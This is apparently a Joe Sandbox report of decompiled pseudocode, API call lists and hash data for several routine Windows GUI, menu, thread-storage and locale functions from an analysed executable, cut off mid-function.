      			E009C964E(intOrPtr __ecx, signed int _a4) {
      				signed int _v8;
      				char _v40;
      				void _v68;
      				intOrPtr _v72;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t12;
      				void* _t14;
      				char* _t23;
      				void* _t29;
      				signed short _t30;
      				struct HDC__* _t31;
      				signed int _t32;
      
      				_t12 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t12 ^ _t32;
      				_t31 = GetStockObject;
      				_t30 = 0xa;
      				_v72 = __ecx;
      				_t23 = "System";
      				_t14 = GetStockObject(0x11);
      				if(_t14 != 0) {
      					L2:
      					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
      						_t23 =  &_v40;
      						_t31 = GetDC(0);
      						if(_v68 < 0) {
      							_v68 =  ~_v68;
      						}
      						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
      						ReleaseDC(0, _t31);
      					}
      					L6:
      					_t16 = _a4;
      					if(_a4 == 0) {
      						_t16 = _t30 & 0x0000ffff;
      					}
      					return E00AAB46A(E009C94FB(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
      				}
      				_t14 = GetStockObject(0xd);
      				if(_t14 == 0) {
      					goto L6;
      				}
      				goto L2;
      			}
      0x009c9656
      0x009c965d
      0x009c9662
      0x009c966b
      0x009c966e
      0x009c9671
      0x009c9676
      0x009c967a
      0x009c9684
      0x009c9693
      0x009c9697
      0x009c96a4
      0x009c96a6
      0x009c96a8
      0x009c96a8
      0x009c96c3
      0x009c96c6
      0x009c96c6
      0x009c96cc
      0x009c96cc
      0x009c96d2
      0x009c96d4
      0x009c96d4
      0x009c96ef
      0x009c96ef
      0x009c967e
      0x009c9682
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetStockObject.GDI32(00000011), ref: 009C9676
      • GetStockObject.GDI32(0000000D), ref: 009C967E
      • GetObjectA.GDI32(00000000,0000003C,?), ref: 009C968B
      • GetDC.USER32(00000000), ref: 009C969A
      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009C96AE
      • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 009C96BA
      • ReleaseDC.USER32 ref: 009C96C6
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Object$Stock$CapsDeviceRelease
      • String ID: System
      • API String ID: 46613423-3470857405
      • Opcode ID: 40d30bc896670c4f4d7b24fe929149bf82d986ddd204b1f9a8dea0baaa97398a
      • Instruction ID: 7f5b4562238ced3b5d2f35aa1000d2b3e93639188ce2b5929bf2c6e1cebb1448
      • Opcode Fuzzy Hash: 40d30bc896670c4f4d7b24fe929149bf82d986ddd204b1f9a8dea0baaa97398a
      • Instruction Fuzzy Hash: 53119171A01218EBEB10DBA4DD49FAE7B78EF45745F00001AFA06A71D1DB719D06CB71
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 90%
      			E009A79BF(int* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
      				struct HMENU__* _v8;
      				intOrPtr _v12;
      				int _v16;
      				signed int _v32;
      				intOrPtr _v36;
      				signed int _v40;
      				int _v44;
      				char _v48;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t57;
      				struct HMENU__* _t61;
      				int _t62;
      				int _t63;
      				struct HMENU__* _t64;
      				int _t66;
      				signed int _t71;
      				int _t72;
      				struct HMENU__* _t73;
      				struct HMENU__* _t74;
      				int _t75;
      				int* _t79;
      				struct HMENU__* _t80;
      				int _t81;
      				int _t82;
      				void* _t87;
      				struct HMENU__* _t88;
      				intOrPtr _t90;
      
      				_t83 = __ecx;
      				_t80 = __ecx;
      				_v8 = __ecx;
      				_t57 = E009BBC7B(__ecx[8]);
      				if(_a12 == 0) {
      					_t90 = _a4;
      					if(__ecx[0x28] == 0) {
      						L3:
      						_t95 = _t90;
      						if(_t90 == 0) {
      							E009B8782(_t83);
      						}
      						_t84 =  &_v48;
      						E009B056D( &_v48);
      						_v36 = _t90;
      						if( *((intOrPtr*)(E009BD1B0(_t80, 0, _t90, _t95) + 0x78)) !=  *(_t90 + 4)) {
      							__eflags =  *((intOrPtr*)(_t80 + 0xf4)) - 1;
      							if( *((intOrPtr*)(_t80 + 0xf4)) != 1) {
      								_t61 =  *(_t80 + 0xf8);
      							} else {
      								_t61 = GetMenu( *(_t80 + 0x20));
      							}
      							__eflags = _t61;
      							if(__eflags == 0) {
      								goto L20;
      							} else {
      								_t84 = _t80;
      								_t73 = E009AE492(_t80, 0);
      								__eflags = _t73;
      								if(__eflags == 0) {
      									goto L20;
      								}
      								_t85 = _t73->i;
      								_t84 = _t73;
      								_t74 =  *((intOrPtr*)(_t73->i + 0x6c))();
      								__eflags = _t74;
      								if(__eflags == 0) {
      									goto L20;
      								}
      								_t88 =  *(_t74 + 4);
      								__eflags = _t88;
      								if(__eflags == 0) {
      									goto L20;
      								}
      								_t75 = GetMenuItemCount(_t88);
      								_t82 = 0;
      								_a12 = _t75;
      								__eflags = _t75;
      								if(__eflags <= 0) {
      									L19:
      									_t80 = _v8;
      									goto L20;
      								} else {
      									goto L15;
      								}
      								while(1) {
      									L15:
      									__eflags = GetSubMenu(_t88, _t82) -  *(_t90 + 4);
      									if(__eflags == 0) {
      										break;
      									}
      									_t82 = _t82 + 1;
      									__eflags = _t82 - _a12;
      									if(__eflags < 0) {
      										continue;
      									}
      									goto L19;
      								}
      								_v12 = E009BC05D(_t82, _t84, _t85, _t88, _t90, __eflags, _t88);
      								goto L19;
      							}
      						} else {
      							_v12 = _t90;
      							L20:
      							_t62 = GetMenuItemCount( *(_t90 + 4));
      							_v40 = _v40 & 0x00000000;
      							_v16 = _t62;
      							if(_t62 == 0) {
      								L40:
      								return _t62;
      							}
      							_t87 = GetMenuItemID;
      							do {
      								_t63 = GetMenuItemID( *(_t90 + 4), _v40);
      								_v44 = _t63;
      								if(_t63 == 0) {
      									goto L39;
      								}
      								_t99 = _t63 - 0xffffffff;
      								if(_t63 != 0xffffffff) {
      									_v32 = _v32 & 0x00000000;
      									__eflags =  *(_t80 + 0x74);
      									if( *(_t80 + 0x74) == 0) {
      										L31:
      										_t64 = 0;
      										__eflags = 0;
      										L32:
      										_push(_t64);
      										L33:
      										_push(_t80);
      										_t84 =  &_v48;
      										E009B0593( &_v48);
      										_t66 = GetMenuItemCount( *(_t90 + 4));
      										_t81 = _t66;
      										if(_t81 >= _v16) {
      											L38:
      											_v16 = _t81;
      											_t80 = _v8;
      											goto L39;
      										}
      										_v40 = _v40 + _t66 - _v16;
      										while(_v40 < _t81) {
      											__eflags = GetMenuItemID( *(_t90 + 4), _v40) - _v44;
      											if(__eflags != 0) {
      												goto L38;
      											}
      											_t48 =  &_v40;
      											 *_t48 = _v40 + 1;
      											__eflags =  *_t48;
      										}
      										goto L38;
      									}
      									__eflags = _t63 - 0xf000;
      									if(_t63 >= 0xf000) {
      										goto L31;
      									}
      									_t64 = 1;
      									goto L32;
      								}
      								_t71 = E009BC05D(_t80, _t84, _t85, _t87, _t90, _t99, GetSubMenu( *(_t90 + 4), _v40));
      								_v32 = _t71;
      								if(_t71 == 0) {
      									goto L39;
      								}
      								_t72 = GetMenuItemID( *(_t71 + 4), 0);
      								_v44 = _t72;
      								if(_t72 != 0 && _t72 != 0xffffffff) {
      									_push(0);
      									goto L33;
      								}
      								L39:
      								_v40 = _v40 + 1;
      								_t62 = _v40;
      							} while (_t62 < _v16);
      							goto L40;
      						}
      					}
      					_t79 = __ecx[0x28];
      					_t85 =  *_t79;
      					_t83 = _t79;
      					_t62 =  *((intOrPtr*)( *_t79 + 0x74))(_t90, _a8, 0);
      					if(_t62 != 0) {
      						goto L40;
      					}
      					goto L3;
      				}
      				return _t57;
      			}
      0x009a79bf
      0x009a79c8
      0x009a79ce
      0x009a79d1
      0x009a79db
      0x009a79e2
      0x009a79eb
      0x009a7a07
      0x009a7a07
      0x009a7a09
      0x009a7a0b
      0x009a7a0b
      0x009a7a10
      0x009a7a13
      0x009a7a18
      0x009a7a26
      0x009a7a2d
      0x009a7a34
      0x009a7a41
      0x009a7a36
      0x009a7a39
      0x009a7a39
      0x009a7a47
      0x009a7a49
      0x00000000
      0x009a7a4b
      0x009a7a4b
      0x009a7a4d
      0x009a7a52
      0x009a7a54
      0x00000000
      0x00000000
      0x009a7a56
      0x009a7a58
      0x009a7a5a
      0x009a7a5d
      0x009a7a5f
      0x00000000
      0x00000000
      0x009a7a61
      0x009a7a64
      0x009a7a66
      0x00000000
      0x00000000
      0x009a7a69
      0x009a7a6f
      0x009a7a71
      0x009a7a74
      0x009a7a76
      0x009a7a96
      0x009a7a96
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a7a78
      0x009a7a78
      0x009a7a80
      0x009a7a83
      0x00000000
      0x00000000
      0x009a7a85
      0x009a7a86
      0x009a7a89
      0x00000000
      0x00000000
      0x00000000
      0x009a7a8b
      0x009a7a93
      0x00000000
      0x009a7a93
      0x009a7a28
      0x009a7a28
      0x009a7a99
      0x009a7a9c
      0x009a7aa2
      0x009a7aa6
      0x009a7aab
      0x009a7b63
      0x00000000
      0x009a7b63
      0x009a7ab1
      0x009a7ab7
      0x009a7abd
      0x009a7abf
      0x009a7ac4
      0x00000000
      0x00000000
      0x009a7aca
      0x009a7acd
      0x009a7aff
      0x009a7b03
      0x009a7b07
      0x009a7b15
      0x009a7b15
      0x009a7b15
      0x009a7b17
      0x009a7b17
      0x009a7b18
      0x009a7b18
      0x009a7b19
      0x009a7b1c
      0x009a7b24
      0x009a7b2a
      0x009a7b2f
      0x009a7b4e
      0x009a7b4e
      0x009a7b51
      0x00000000
      0x009a7b51
      0x009a7b34
      0x009a7b49
      0x009a7b41
      0x009a7b44
      0x00000000
      0x00000000
      0x009a7b46
      0x009a7b46
      0x009a7b46
      0x009a7b46
      0x00000000
      0x009a7b49
      0x009a7b09
      0x009a7b0e
      0x00000000
      0x00000000
      0x009a7b12
      0x00000000
      0x009a7b12
      0x009a7adc
      0x009a7ae1
      0x009a7ae6
      0x00000000
      0x00000000
      0x009a7aed
      0x009a7aef
      0x009a7af4
      0x009a7afb
      0x00000000
      0x009a7afb
      0x009a7b54
      0x009a7b54
      0x009a7b57
      0x009a7b5a
      0x00000000
      0x009a7ab7
      0x009a7a26
      0x009a79ed
      0x009a79f3
      0x009a79f9
      0x009a79fc
      0x009a7a01
      0x00000000
      0x00000000
      0x00000000
      0x009a7a01
      0x009a7b67

      APIs
        • Part of subcall function 009BBC7B: GetFocus.USER32(?,?,009A632A,?), ref: 009BBC81
        • Part of subcall function 009BBC7B: GetParent.USER32(00000000), ref: 009BBCA9
        • Part of subcall function 009BBC7B: GetWindowLongA.USER32 ref: 009BBCC4
        • Part of subcall function 009BBC7B: GetParent.USER32(?), ref: 009BBCD2
        • Part of subcall function 009BBC7B: GetDesktopWindow.USER32 ref: 009BBCD6
        • Part of subcall function 009BBC7B: SendMessageA.USER32 ref: 009BBCEA
      • GetMenu.USER32(?), ref: 009A7A39
      • GetMenuItemCount.USER32 ref: 009A7A69
      • GetSubMenu.USER32 ref: 009A7A7A
      • GetMenuItemCount.USER32 ref: 009A7A9C
      • GetMenuItemID.USER32(?,00000000), ref: 009A7ABD
      • GetSubMenu.USER32 ref: 009A7AD5
      • GetMenuItemID.USER32(?,00000000), ref: 009A7AED
      • GetMenuItemCount.USER32 ref: 009A7B24
      • GetMenuItemID.USER32(?,00000000), ref: 009A7B3F
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
      • String ID:
      • API String ID: 4186786570-0
      • Opcode ID: e3679856c9da57c173a90424e0550af4301ec7f42f89609db429a909d84a1dd8
      • Instruction ID: 13ba374afd8f4e210a780f9ee758ddfc7bc9e1c84f8d1d5988375b7e1504eef3
      • Opcode Fuzzy Hash: e3679856c9da57c173a90424e0550af4301ec7f42f89609db429a909d84a1dd8
      • Instruction Fuzzy Hash: 63516B70A04206EBCF11DFE4CD86AAEF7B9FF8A311F244965E426A6151D731DE41CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E009BCB7A(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
      				void* _t36;
      				void* _t39;
      				long _t41;
      				void* _t42;
      				long _t47;
      				void* _t53;
      				signed int _t55;
      				long* _t62;
      				struct _CRITICAL_SECTION* _t64;
      				void* _t65;
      				void* _t66;
      
      				_push(0x10);
      				E00AAD265(0xac8a93, __ebx, __edi, __esi);
      				_t62 = __ecx;
      				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
      				_t64 = __ecx + 0x1c;
      				 *(_t66 - 0x14) = _t64;
      				EnterCriticalSection(_t64);
      				_t36 =  *(_t66 + 8);
      				if(_t36 <= 0 || _t36 >= _t62[3]) {
      					_push(_t64);
      				} else {
      					_t65 = TlsGetValue( *_t62);
      					if(_t65 == 0) {
      						 *(_t66 - 4) = 0;
      						_t39 = E009BC82A(0x10);
      						__eflags = _t39;
      						if(_t39 == 0) {
      							_t65 = 0;
      							__eflags = 0;
      						} else {
      							 *_t39 = 0xada330;
      							_t65 = _t39;
      						}
      						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
      						_t51 =  &(_t62[5]);
      						 *(_t65 + 8) = 0;
      						 *(_t65 + 0xc) = 0;
      						E009BC942( &(_t62[5]), _t65);
      						goto L5;
      					} else {
      						_t55 =  *(_t66 + 8);
      						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
      							L5:
      							_t75 =  *(_t65 + 0xc);
      							if( *(_t65 + 0xc) != 0) {
      								_t41 = E009B9E19(0, _t51, _t62, _t65, __eflags, _t62[3], 4);
      								_t53 = 2;
      								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
      							} else {
      								_t47 = E009B9E19(0, _t51, _t62, _t65, _t75, _t62[3], 4);
      								_pop(_t53);
      								_t42 = LocalAlloc(0, _t47);
      							}
      							if(_t42 == 0) {
      								LeaveCriticalSection( *(_t66 - 0x14));
      								_t42 = E009B874A(_t53);
      							}
      							 *(_t65 + 0xc) = _t42;
      							E00AAB3F0(_t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
      							 *(_t65 + 8) = _t62[3];
      							TlsSetValue( *_t62, _t65);
      							_t55 =  *(_t66 + 8);
      						}
      					}
      					_t36 =  *(_t65 + 0xc);
      					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
      						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
      					}
      					_push( *(_t66 - 0x14));
      				}
      				LeaveCriticalSection();
      				return E00AAD30A(_t36);
      			}
      0x009bcb7a
      0x009bcb81
      0x009bcb86
      0x009bcb88
      0x009bcb8b
      0x009bcb8f
      0x009bcb92
      0x009bcb98
      0x009bcb9f
      0x009bcca0
      0x009bcbae
      0x009bcbb6
      0x009bcbba
      0x009bcbee
      0x009bcbf1
      0x009bcbf6
      0x009bcbf8
      0x009bcc04
      0x009bcc04
      0x009bcbfa
      0x009bcbfa
      0x009bcc00
      0x009bcc00
      0x009bcc06
      0x009bcc0b
      0x009bcc0e
      0x009bcc11
      0x009bcc14
      0x00000000
      0x009bcbbc
      0x009bcbbc
      0x009bcbc2
      0x009bcbd1
      0x009bcbd1
      0x009bcbd4
      0x009bcc38
      0x009bcc3e
      0x009bcc43
      0x009bcbd6
      0x009bcbdb
      0x009bcbe1
      0x009bcbe4
      0x009bcbe4
      0x009bcc4b
      0x009bcc50
      0x009bcc56
      0x009bcc56
      0x009bcc5e
      0x009bcc6f
      0x009bcc7b
      0x009bcc80
      0x009bcc86
      0x009bcc86
      0x009bcbc2
      0x009bcc89
      0x009bcc8e
      0x009bcc98
      0x009bcc98
      0x009bcc9b
      0x009bcc9b
      0x009bcca1
      0x009bccac

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009BCB81
      • EnterCriticalSection.KERNEL32(?,00000010,009BCE3D,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCB92
      • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCBB0
      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009BCBE4
      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCC50
      • _memset.LIBCMT ref: 009BCC6F
      • TlsSetValue.KERNEL32(?,00000000), ref: 009BCC80
      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004,009A4418), ref: 009BCCA1
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
      • String ID:
      • API String ID: 1891723912-0
      • Opcode ID: 29a76459a90c44f763eaed1862b8e449e17a541c742670e1bf2280ddf21b7f2f
      • Instruction ID: 56824585d56a5061414f0a2e73340280351fef2df43fb02e404d57bf531ef7b5
      • Opcode Fuzzy Hash: 29a76459a90c44f763eaed1862b8e449e17a541c742670e1bf2280ddf21b7f2f
      • Instruction Fuzzy Hash: CF3192B0400606EFCB20EF64DA89EAABBB4FF54320710C92EF55B9B551CB31AD51CB90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 81%
      			E009B4386(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
      				signed int _v8;
      				char _v9;
      				char _v268;
      				struct HWND__* _v272;
      				signed int _v276;
      				long _v280;
      				struct HWND__* _v284;
      				intOrPtr _v288;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t36;
      				signed int _t53;
      				intOrPtr _t56;
      				long _t59;
      				struct HWND__* _t62;
      				CHAR* _t63;
      				void* _t64;
      				void* _t66;
      				void* _t70;
      				void* _t71;
      				signed int _t72;
      				void* _t74;
      				void* _t75;
      				signed int _t77;
      				void* _t78;
      				signed int _t82;
      
      				_t70 = __edx;
      				_t80 = _t82;
      				_t36 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t36 ^ _t82;
      				_t72 = _a4;
      				_t77 = 0;
      				_v288 = _a8;
      				E009B4299(0);
      				_t66 = _t71;
      				_t62 = E009B42D4(0,  &_v272);
      				_v284 = _t62;
      				if(_t62 != _v272) {
      					EnableWindow(_t62, 1);
      				}
      				_v280 = _v280 & _t77;
      				GetWindowThreadProcessId(_t62,  &_v280);
      				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
      					L7:
      					__eflags = _t72;
      					if(__eflags != 0) {
      						_t77 = _t72 + 0x7c;
      					}
      					goto L9;
      				} else {
      					_t59 = SendMessageA(_t62, 0x376, 0, 0);
      					if(_t59 == 0) {
      						goto L7;
      					} else {
      						_t77 = _t59;
      						L9:
      						_v276 = _v276 & 0x00000000;
      						if(_t77 != 0) {
      							_v276 =  *_t77;
      							_t56 = _a16;
      							if(_t56 != 0) {
      								 *_t77 = _t56 + 0x30000;
      							}
      						}
      						if((_a12 & 0x000000f0) == 0) {
      							_t53 = _a12 & 0x0000000f;
      							if(_t53 <= 1) {
      								_t23 =  &_a12;
      								 *_t23 = _a12 | 0x00000030;
      								__eflags =  *_t23;
      							} else {
      								if(_t53 + 0xfffffffd <= 1) {
      									_a12 = _a12 | 0x00000020;
      								}
      							}
      						}
      						_v268 = 0;
      						_t97 = _t72;
      						if(_t72 == 0) {
      							_t63 =  &_v268;
      							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
      							if(__eflags == 0) {
      								_v9 = 0;
      							}
      						} else {
      							_t63 =  *(_t72 + 0x50);
      						}
      						_push(_a12);
      						_push(_t63);
      						_push(_v288);
      						_push(_v284);
      						_t74 = E009AB656(_t66, _t77, _t97);
      						if(_t77 != 0) {
      							 *_t77 = _v276;
      						}
      						if(_v272 != 0) {
      							EnableWindow(_v272, 1);
      						}
      						E009B4299(1);
      						_pop(_t75);
      						_pop(_t78);
      						_pop(_t64);
      						return E00AAB46A(_t74, _t64, _v8 ^ _t80, _t70, _t75, _t78);
      					}
      				}
      			}
      0x009b4386
      0x009b4389
      0x009b4391
      0x009b4398
      0x009b43a1
      0x009b43a4
      0x009b43a7
      0x009b43ad
      0x009b43b2
      0x009b43c0
      0x009b43c2
      0x009b43ce
      0x009b43d3
      0x009b43d3
      0x009b43d9
      0x009b43e7
      0x009b43ef
      0x009b4417
      0x009b4417
      0x009b4419
      0x009b441b
      0x009b441b
      0x00000000
      0x009b43ff
      0x009b4409
      0x009b4411
      0x00000000
      0x009b4413
      0x009b4413
      0x009b441e
      0x009b441e
      0x009b4427
      0x009b442b
      0x009b4431
      0x009b4436
      0x009b443d
      0x009b443d
      0x009b4436
      0x009b4443
      0x009b4448
      0x009b444e
      0x009b445e
      0x009b445e
      0x009b445e
      0x009b4450
      0x009b4456
      0x009b4458
      0x009b4458
      0x009b4456
      0x009b444e
      0x009b4462
      0x009b4469
      0x009b446b
      0x009b4472
      0x009b4489
      0x009b448b
      0x009b448d
      0x009b448d
      0x009b446d
      0x009b446d
      0x009b446d
      0x009b4491
      0x009b4494
      0x009b4495
      0x009b449b
      0x009b44a9
      0x009b44ad
      0x009b44b5
      0x009b44b5
      0x009b44be
      0x009b44c8
      0x009b44c8
      0x009b44d0
      0x009b44db
      0x009b44dc
      0x009b44df
      0x009b44e6
      0x009b44e6
      0x009b4411

      APIs
        • Part of subcall function 009B42D4: GetParent.USER32(009A4695), ref: 009B4328
        • Part of subcall function 009B42D4: GetLastActivePopup.USER32(009A4695), ref: 009B4339
        • Part of subcall function 009B42D4: IsWindowEnabled.USER32(009A4695), ref: 009B434D
        • Part of subcall function 009B42D4: EnableWindow.USER32(009A4695,00000000), ref: 009B4360
      • EnableWindow.USER32(?,00000001), ref: 009B43D3
      • GetWindowThreadProcessId.USER32(?,?), ref: 009B43E7
      • GetCurrentProcessId.KERNEL32 ref: 009B43F1
      • SendMessageA.USER32 ref: 009B4409
      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 009B4483
      • EnableWindow.USER32(00000000,00000001), ref: 009B44C8
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
      • String ID: 0
      • API String ID: 1877664794-4108050209
      • Opcode ID: 2374ccc4e4640b031f4a90f33e1e9a95355179fcbb67eb09df6a94dfa5263256
      • Instruction ID: d9ba75eef14d5cd0885d79a32fdb40ca5293c5d62f634024f58227ff0e868b8a
      • Opcode Fuzzy Hash: 2374ccc4e4640b031f4a90f33e1e9a95355179fcbb67eb09df6a94dfa5263256
      • Instruction Fuzzy Hash: FF41D172A0022CABDB20DF64CE46BD9B7F9FF44720F1405A5F65596292D7B08E909F90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 92%
      			E009A2C90(char _a4) {
      				intOrPtr _v8;
      				char _v16;
      				char _v20;
      				char _v24;
      				char _v28;
      				char _v40;
      				void* __edi;
      				signed int _t29;
      				intOrPtr _t33;
      				void* _t37;
      				intOrPtr _t39;
      				intOrPtr _t42;
      				void* _t45;
      				signed int _t48;
      				signed int _t49;
      				char _t51;
      				intOrPtr _t54;
      				signed int _t70;
      				intOrPtr _t71;
      				signed int _t73;
      
      				_push(0xffffffff);
      				_push(0xac7878);
      				_push( *[fs:0x0]);
      				_t29 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t29 ^ _t73);
      				 *[fs:0x0] =  &_v16;
      				E00AC5AED( &_v28, 0);
      				_t51 =  *0xd0e048; // 0x2781240
      				_v8 = 0;
      				_v20 = _t51;
      				if( *0xd0e04c == 0) {
      					E00AC5AED( &_v24, 0);
      					if( *0xd0e04c == 0) {
      						_t48 =  *0xd14518; // 0x2
      						_t49 = _t48 + 1;
      						 *0xd14518 = _t49;
      						 *0xd0e04c = _t49;
      					}
      					E00AC5B15( &_v24);
      				}
      				_t67 = _a4;
      				_t70 =  *0xd0e04c; // 0x2
      				_t33 =  *_a4;
      				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
      					_t54 = 0;
      					goto L6;
      				} else {
      					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
      					if(_t54 != 0) {
      						L10:
      						_t71 = _t54;
      						L11:
      						if(_t71 != 0) {
      							L19:
      							_v8 = 0xffffffff;
      							E00AC5B15( &_v28);
      							 *[fs:0x0] = _v16;
      							return _t71;
      						}
      						L12:
      						if(_t51 == 0) {
      							_t37 = E009A2720(_t65, _t67,  &_v20, _t67);
      							__eflags = _t37 - 0xffffffff;
      							if(_t37 == 0xffffffff) {
      								E00AAAF63( &_v40, "bad cast");
      								E00AAB8C9( &_v40, 0xb0b234);
      							}
      							_t71 = _v20;
      							 *0xd0e048 = _t71;
